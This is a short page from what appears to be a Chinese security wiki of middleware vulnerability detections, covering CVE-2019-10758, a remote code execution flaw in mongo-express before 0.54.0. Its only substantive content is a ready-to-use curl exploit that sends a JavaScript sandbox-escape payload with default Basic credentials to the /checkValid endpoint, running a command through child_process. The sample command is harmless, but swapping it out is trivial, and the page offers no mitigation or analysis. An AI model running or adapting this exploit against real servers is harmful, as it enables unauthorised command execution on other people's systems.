menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right Mongo chevron_right CVE-2019-10758 mongo-express RCE
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    CVE-2019-10758:mongo-express RCE 无回显

    影响版本:

    • mongo-express < 0.54.0

    exp: 

    curl 'http://vulhost:8080/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("calc")'

    @masahiro331